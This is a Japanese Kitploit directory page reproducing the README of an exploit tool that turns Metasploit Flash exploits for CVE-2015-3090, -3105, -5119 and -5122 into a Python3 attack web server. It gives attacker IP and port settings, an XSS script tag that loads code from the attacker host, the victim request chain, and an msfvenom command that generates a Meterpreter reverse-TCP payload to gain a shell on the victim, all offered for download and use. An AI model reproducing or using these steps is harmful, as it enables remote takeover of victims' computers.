Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Adobe-Flash-Exploits_17-18 — Metasploitのエクスプロイトを、Adobe Flashの脆弱性CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、CVE-2015-5122向けにPython3スクリプトに変換しました。 | Kitploit
ツール/GitHubGitHub/xattam1/adobe-flash-exploits_17-18
エクスプロイトフレームワークペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubxattam1/adobe-flash-exploits_17-18

Adobe-Flash-Exploits_17-18

Metasploitのエクスプロイトを、Adobe Flashの脆弱性CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、CVE-2015-5122向けにPython3スクリプトに変換しました。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
14年前未レビュー

Adobe Flash Exploits CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、および CVE-2015-5122 Python3 スクリプト

Adobe Flash の脆弱性 CVE-2015-3090、CVE-2015-3105、CVE-2015-5119、および CVE-2015-5122 に対する Metasploit エクスプロイトを Python3 スクリプトに変換しました。

情報

このスクリプトは、以下の Adobe Flash 脆弱性のいずれかを一度に悪用できる Web サーバーをホストします。

  1. CVE-2015-3090
  2. CVE-2015-3105
  3. CVE-2015-5119
  4. CVE-2015-5122

実行

必要に応じて、exploit.py を変更する必要があります(ここで説明)。

変更点

  • hostname = "192.168.1.100"
    • これはエクスプロイト Web サーバーをホストする攻撃システムの IP アドレスです。
  • serverPort = 8080
    • これはエクスプロイト Web サーバーをホストする攻撃システムのポート番号です。
  • xss = False
    • True に設定すると、被害者からの最初のリクエストは JavaScript として扱われます:
      • XSS インジェクションの例:
        • <script src="http://192.168.1.100:8080/"></script>
      • 攻撃経路:
        • 被害者リクエスト 1 -> XSS 脆弱なサーバー:
          • 被害者はリモートサーバー上の XSS インジェクションにアクセスし、JavaScript ファイルを要求します(リクエスト 2 参照)。
        • 被害者リクエスト 2 -> 攻撃システム上の JavaScript ソース。
        • 被害者リクエスト 3 -> 悪意のある swf ファイル。
    • False に設定すると、被害者からの最初のリクエストは HTML として扱われます:
      • 例:
        • http://192.168.1.100:8080/
      • 攻撃経路:
        • 被害者リクエスト 1 -> 攻撃システム上の HTML ファイル。
        • 被害者リクエスト 2 -> 悪意のある swf ファイル。
  • base64Payload = "..."
    • これは被害者システム上で実行される base64 ペイロードです。
    • 以下のコマンド例を必要に応じて変更し、ペイロードを生成してください:
      • 例:
        • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64
      • 注意: 私が動作を確認した唯一のペイロードは windows/meterpreter/reverse_tcp です。

  • swfFile = swfFileList['37368']
    • 被害者システムの悪用に使用する Adobe Flash エクスプロイト swf ファイルを選択します:
      • root@kitploit:~
        swfFileList = {
            '37368': 'CVE-2015-3090.swf',
            '37448': 'CVE-2015-3105.swf',
            '37523': 'CVE-2015-5119.swf',
            '37599': 'CVE-2015-5122.swf'
        }
        

実行

悪意のある swf ファイルと同じディレクトリで以下のコマンドを実行して、Adobe Flash エクスプロイトスクリプトを実行します:

  • python3 exploit.py

参考文献

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599

ツールをダウンロード